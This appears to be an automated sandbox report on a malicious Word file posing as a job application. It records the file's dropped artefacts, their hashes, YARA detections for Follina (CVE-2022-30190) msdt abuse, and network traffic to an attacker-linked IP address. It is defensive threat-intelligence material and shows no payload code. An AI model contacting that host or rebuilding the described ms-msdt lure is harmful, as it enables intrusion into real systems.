      Preview:<!doctype html>.<html lang="en">.<body>.<script>.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAA
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:HTML document, ASCII text, with very long lines
      Category:dropped
      Size (bytes):6785
      Entropy (8bit):1.4819495400876375
      Encrypted:false
      SSDEEP:24:0pildlK8PkikLnPKZ2kbsMiPlRKVAsyeJuasL34SJ4T:08ldnUPyNbsMiPDlwsj4S2T
      MD5:119DBEA31494051D0D82FE7B2DBF8F93
      SHA1:E165513F48E0A94BD49D880421A3BFBD07B59ACA
      SHA-256:B621E986424FA067D0F46508FBEE741836B87AD44B373EEA01004E1C4896A31B
      SHA-512:01A9D0A7FA858721622AC73D3AA4F5AF3BF6DA702E9E6B7CB6077DB08A66944E4248DB561E9EF9FBD092ED62308FEF57BAFAF323C4C51A66136F8B7329944705
      Malicious:true
      Yara Hits:
      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html, Author: Nasreddine Bencherchali, Christian Burkard
      • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html, Author: Tobias Michalski, Christian Burkard
      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html, Author: Joe Security
      Antivirus:
      • Antivirus: Avira, Detection: 100%
      Reputation:low
      Preview:<!doctype html>.<html lang="en">.<body>.<script>.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAA
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:HTML document, ASCII text, with very long lines
      Category:dropped
      Size (bytes):6785
      Entropy (8bit):1.4819495400876375
      Encrypted:false
      SSDEEP:24:0pildlK8PkikLnPKZ2kbsMiPlRKVAsyeJuasL34SJ4T:08ldnUPyNbsMiPDlwsj4S2T
      MD5:119DBEA31494051D0D82FE7B2DBF8F93
      SHA1:E165513F48E0A94BD49D880421A3BFBD07B59ACA
      SHA-256:B621E986424FA067D0F46508FBEE741836B87AD44B373EEA01004E1C4896A31B
      SHA-512:01A9D0A7FA858721622AC73D3AA4F5AF3BF6DA702E9E6B7CB6077DB08A66944E4248DB561E9EF9FBD092ED62308FEF57BAFAF323C4C51A66136F8B7329944705
      Malicious:true
      Yara Hits:
      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html, Author: Nasreddine Bencherchali, Christian Burkard
      • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html, Author: Tobias Michalski, Christian Burkard
      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html, Author: Joe Security
      Antivirus:
      • Antivirus: Avira, Detection: 100%
      Preview:<!doctype html>.<html lang="en">.<body>.<script>.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAA
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:PNG image data, 472 x 598, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):46224
      Entropy (8bit):7.952830864450301
      Encrypted:false
      SSDEEP:768:SXvKJDFb6VF0ZFm/C+pLUGAc+FREoRQ6I0IMRQRpyVCI5O4zn+O6ajETW:3MyD2jAfFGJsCRpyrO4zn+O6dK
      MD5:2D63CD1ECDCFF4BDAFBC58CC864A3E4A
      SHA1:7262B35EF8E8E20BEB4D6F65D70E9672F2A5587A
      SHA-256:9582FFB5FAB18CE903464EABEC820C51A3C24672C2A67C4200381164CE554BE8
      SHA-512:E94C42D46CBEC76AA9AC151C129AE126F39B6EF9B69D7EA559F4BA05660A97A29889994256EDF7015FA5BFC7A2EFDDC1E7BF36A1BEAC98AC5B590E29A24A0C01
      Malicious:false
      Preview:.PNG........IHDR.......V.....t.......sRGB.........pHYs..........+.....5IDATx^..$.$..9........;..d.W.>.7.V.uvgE.......n.......].Pw....L...Lu..<<..S;v..1.]/^.xe.k.]+'._.@...A`#...H....A ....#.C.q.SB...A`C...o..d..A .l....c...@....B .xC.%s...A`....o.....@....1.../..@....G .x.... .......!..|....@..8..^.|..RRB...A ....|....d..A .........R.@....F .x..%c...A`6.........@.X7.1.....@....A .x68.. .......!^7t....@....1..1... ...@..K. ....l..!...)%... .n.b...]2.. ..f.@..lpL)A ...u#.C.n.1... 0..b.g.cJ..A ......uC..A .... .C<..SJ...A`.......d..A .........R.@....F .x..%c...A`6.........@.X7.1.....@....A .x68.. .......!^7t....@....1..1... ...@..K. ....l..!...)%... .n.b...]2.. ..f.@..lpL)A ...u#.C.n.1... 0..b.g.cJ..A ......uC..A .... .C<..SJ...A`.......d..A .........R.@....F .x..%c...A`6.........@.X7.1.....@....A .x68.. .......!^7t....@....1..1... ...@..K. ....l..!...)%... .n.v.|.r.79....... 0..].vy..:..f..g...x..O.A ....@.q. ... .....oq... .....p./F.;..{......w.^.
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.025592455096956984
      Encrypted:false
      SSDEEP:6:I3DPcjCFvxggLRHYKfYRXv//4tfnRujlw//+GtluJ/eRuj:I3DPFrQvYg3J/
      MD5:C65E6C43949F0E1291B495961A463852
      SHA1:47A81BF112B13637D69A63B6A5B05AED2C67309C
      SHA-256:D93BC2C88406DC8A533D53E6B8EDC6AFF8D7DF3EC627502052D0632E53F004EE
      SHA-512:47F356E52A354B982D6765D15BE0345CAB20787BE56DAC12868615F46AB16AE09029C23D811BA543B489F91A8C4334A8E2814C5E0909FC5B26FFD917CDA18ED0
      Malicious:false
      Preview:......M.eFy...zqU2].m.J..3...&.S,...X.F...Fa.q.............................e....F.?a.B.S>...........l.,-A....@........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.025533631561520997
      Encrypted:false
      SSDEEP:6:I3DPcWeRvxggLREsH4/jBcfRXv//4tfnRujlw//+GtluJ/eRuj:I3DPSIsY/jBcJvYg3J/
      MD5:BB8B5FEA0EBA4355ED3209292FB5B6D5
      SHA1:57FABD411996035F633D3147BCE5C5352319F4E1
      SHA-256:F4A3AB9B358EE2BE85A8AD1FEB4B356068A700F691213E155AC98BD4CC023471
      SHA-512:5C067BDBA6E4E9D6964F73153E84C908627783AE9FDEDB602E04A61389EE67D4F4084DCDC460D3BBAA664353AD0D649C0A28B6F7321C6984A0B97F9C83A041FC
      Malicious:false
      Preview:......M.eFy...z>V.,...B../.'d..S,...X.F...Fa.q............................i.D...B.....Q..........0...LK+L.Fd.V.&.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:56 2022, mtime=Tue Mar 8 15:45:56 2022, atime=Mon Sep 19 21:34:14 2022, length=105652, window=hide
      Category:dropped
      Size (bytes):1014
      Entropy (8bit):4.579236388450332
      Encrypted:false
      SSDEEP:12:8fssFgXg/XAlCPCHaXNBQtB/SxXX+WacfY5iQOkDeicvb/3OkDKNDtZ3YilMMEpT:8fD/XT9SUDZQv9ezvODv3q+u7D
      MD5:BAFA09C6DD712A4DF8D35FB2B70D22AF
      SHA1:EA88399956CF7DDB6B803381DC49B8CEA3FE90B2
      SHA-256:01C711A49EF9F3FFA16899B929D046996E9EE56BF34303E5106EC41448123EA1
      SHA-512:B6266651EE3B987EFB43092DBA86975E0AD1F859C4DD4B0645259400E7A2740B0A21670E8473358841A717B3031873AF7770478801BCBE4FA99F3813D8C0F9C7
      Malicious:false
      Preview:L..................F.... ... d...3.. d...3..qA..w................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.....3UH. .BEWERB~1.DOC..J......hT..hT..*...r.....'...............B.e.w.e.r.b.u.n.g...d.o.c.x.......x...............-...8...[............?J......C:\Users\..#...................\\035347\Users.user\Desktop\Bewerbung.docx.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.B.e.w.e.r.b.u.n.g...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......035347..........D_....3N...W...9G..N..... .....[D_....3N...W...9G..N..
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):70
      Entropy (8bit):4.6877135109366135
      Encrypted:false
      SSDEEP:3:bDuMJl/IAlmxWsAzNAlv:bC0HTzq1
      MD5:24A53B806CB95D3F9F02BA065B7E5246
      SHA1:F5B36A4155A9702352ABD00999CA64A144EC7ED2
      SHA-256:77E29811AB165B4128F3DBE3774EE26C230570A0BBE2DD8EF334FAC1931F3CE4
      SHA-512:64C254633D1C58563292CCAC8D79D1E79F0404F73482EC5FC399FD80E338285644E1CF6CA9B341B7B3F9EBCFF03E4694DBEF266A9EBE44DC7EFEC9A3D54599AE
      Malicious:false
      Preview:[folders]..Templates.LNK=0..Bewerbung.LNK=0..[misc]..Bewerbung.LNK=0..
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.503835550707525
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
      MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
      SHA1:23684CCAA587C442181A92E722E15A685B2407B1
      SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
      SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
      Malicious:false
      Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.503835550707525
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
      MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
      SHA1:23684CCAA587C442181A92E722E15A685B2407B1
      SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
      SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
      Malicious:false
      Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
      File type:Microsoft Word 2007+
      Entropy (8bit):7.950500079961013
      TrID:
      • Word Microsoft Office Open XML Format document (49504/1) 49.01%
      • Word Microsoft Office Open XML Format document (43504/1) 43.07%
      • ZIP compressed archive (8000/1) 7.92%
      File name:Bewerbung.docx
      File size:105652
      MD5:e7521cc41970a93d81eb7db063563474
      SHA1:668afe1cf1ff3a6b8b9f9b0ceaa81549944bffc2
      SHA256:d28398402e0b64cfb6e1f8e28cc21584eddd159690c2dab80aafae9c79201ae0
      SHA512:660b372282395fec631a3b83693d5156a71408b59e72b22caa085dca025b11628d718ddae35866b60d29735e68665c28dcf0dcfb66205735b5cd098fab0a8691
      SSDEEP:1536:ysMyD2jAfFGJsCRpyrO4zn+O6dmlBvMT5oqFWIrjQBxwhQflTNJR1Aiaa9340:ysMy63s4pxAMT5oarsBxMQBNJRNFy0
      TLSH:ECA3023F26483EEAD705837A901514F7671880B562042F5AEA738ECCD9D962F3E3B674
      File Content Preview:PK..........!.R(G]t...........[Content_Types].xml ...(.........................................................................................................................................................................................................
      Icon Hash:e4e6a2a2a4b4b4a4
      Document Type:OpenXML
      Number of OLE Files:1
      Has Summary Info:
      Application Name:
      Encrypted Document:False
      Contains Word Document Stream:True
      Contains Workbook/Book Stream:False
      Contains PowerPoint Document Stream:False
      Contains Visio Document Stream:False
      Contains ObjectPool Stream:False
      Flash Objects Count:0
      Contains VBA Macros:False
      Title:
      Subject:
      Author:
      Keywords:
      Template:
      Last Saved By:
      Revion Number:1
      Total Edit Time:0
      Create Time:2022-09-16T01:00:00Z
      Last Saved Time:2022-09-16T01:03:00Z
      Number of Pages:1
      Number of Words:3
      Number of Characters:24
      Creating Application:
      Security:0
      Number of Lines:1
      Number of Paragraphs:1
      Thumbnail Scaling Desired:false
      Company:
      Contains Dirty Links:false
      Shared Document:false
      Changed Hyperlinks:false
      Application Version:16.0000
      General
      Stream Path:\x1CompObj
      File Type:data
      Stream Size:77
      Entropy:2.954779533874008
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . F . . . . P B r u s h . . . . . P B r u s h . . . . . P B r u s h . 9 q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 0a 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 07 00 00 00 50 42 72 75 73 68 00 07 00 00 00 50 42 72 75 73 68 00 07 00 00 00 50 42 72 75 73 68 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      General
      Stream Path:\x1Ole
      File Type:data
      Stream Size:20
      Entropy:0.8475846798245739
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . .
      Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      General
      Stream Path:\x1Ole10Native
      File Type:data
      Stream Size:846852
      Entropy:2.951888117201784
      Base64 Encoded:False
      Data ASCII:. . . B M . . . . . . 6 . . . ( . . . . . . V . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:00 ec 0c 00 42 4d e6 eb 0c 00 00 00 00 00 36 00 00 00 28 00 00 00 d8 01 00 00 56 02 00 00 01 00 18 00 00 00 00 00 b0 eb 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
      General
      Stream Path:\x3ObjInfo
      File Type:data
      Stream Size:6
      Entropy:1.2516291673878228
      Base64 Encoded:False
      Data ASCII:. . . . . .
      Data Raw:00 00 03 00 04 00
      TimestampSource PortDest PortSource IPDest IP
      Sep 19, 2022 15:35:09.402124882 CEST4917321192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:09.448999882 CEST2149173185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:09.449101925 CEST4917321192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:09.497766972 CEST2149173185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:09.497874975 CEST4917321192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:09.499121904 CEST4917321192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:09.545845985 CEST2149173185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:09.546256065 CEST2149173185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:09.546358109 CEST4917321192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:09.558320999 CEST4917321192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:09.635483980 CEST2149173185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:09.635663033 CEST4917321192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:09.666477919 CEST4917421192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:09.712331057 CEST2149174185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:09.712466002 CEST4917421192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:09.762413025 CEST2149174185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:09.762515068 CEST4917421192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:09.763664961 CEST4917421192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:09.809447050 CEST2149174185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:09.809530973 CEST2149174185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:09.809631109 CEST4917421192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:09.809971094 CEST4917421192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:09.883455038 CEST2149174185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:09.883622885 CEST4917421192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:09.884032011 CEST4917421192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:09.930010080 CEST2149174185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:09.930320024 CEST4917421192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:09.932235956 CEST4917421192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:09.978365898 CEST2149174185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:09.978560925 CEST4917421192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:09.983947039 CEST4917539352192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:10.029231071 CEST3935249175185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:10.029839039 CEST4917539352192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:10.030390024 CEST4917421192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:10.077305079 CEST2149174185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:10.077408075 CEST4917421192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:10.077773094 CEST4917421192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:10.123992920 CEST2149174185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:10.124073029 CEST3935249175185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:10.124116898 CEST4917421192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:10.124129057 CEST4917539352192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:10.124149084 CEST3935249175185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:10.124182940 CEST3935249175185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:10.124197006 CEST4917539352192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:10.124216080 CEST3935249175185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:10.124222040 CEST4917539352192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:10.124248981 CEST3935249175185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:10.124258995 CEST4917539352192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:10.124274015 CEST3935249175185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:10.124295950 CEST4917539352192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:10.124296904 CEST3935249175185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:10.124320984 CEST2149174185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:10.124330997 CEST4917539352192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:10.124346972 CEST4917539352192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:10.124367952 CEST4917421192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:13.237507105 CEST4917321192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:13.283632994 CEST2149173185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:13.283799887 CEST4917321192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:13.284157991 CEST4917321192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:13.330005884 CEST2149173185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:13.330168962 CEST4917321192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:13.330579042 CEST4917321192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:13.376211882 CEST2149173185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:13.376344919 CEST4917321192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:13.377398014 CEST4917321192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:13.424968958 CEST2149173185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:13.425057888 CEST4917321192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:13.425141096 CEST4917321192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:13.472584009 CEST2149173185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:13.472754955 CEST4917321192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:13.477826118 CEST4917321192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:13.525742054 CEST2149173185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:13.525924921 CEST4917321192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:13.531837940 CEST4917539352192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:13.533164024 CEST4917721192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:13.581041098 CEST3935249175185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:13.582622051 CEST2149177185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:13.583245993 CEST4917721192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:13.630390882 CEST2149177185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:13.630552053 CEST4917721192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:13.631063938 CEST4917721192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:13.677095890 CEST2149177185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:13.677181005 CEST2149177185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:13.677294016 CEST4917721192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:13.677336931 CEST4917721192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:13.762310028 CEST2149177185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:16.897815943 CEST2149177185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:16.898062944 CEST4917721192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:16.913120985 CEST4917721192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:16.959027052 CEST2149177185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:16.959233999 CEST4917721192.168.2.22185.27.134.11
      Sep 19, 2022 15:35:16.959665060 CEST2149177185.27.134.11192.168.2.22
      Sep 19, 2022 15:35:16.959733963 CEST4917721192.168.2.22185.27.134.11
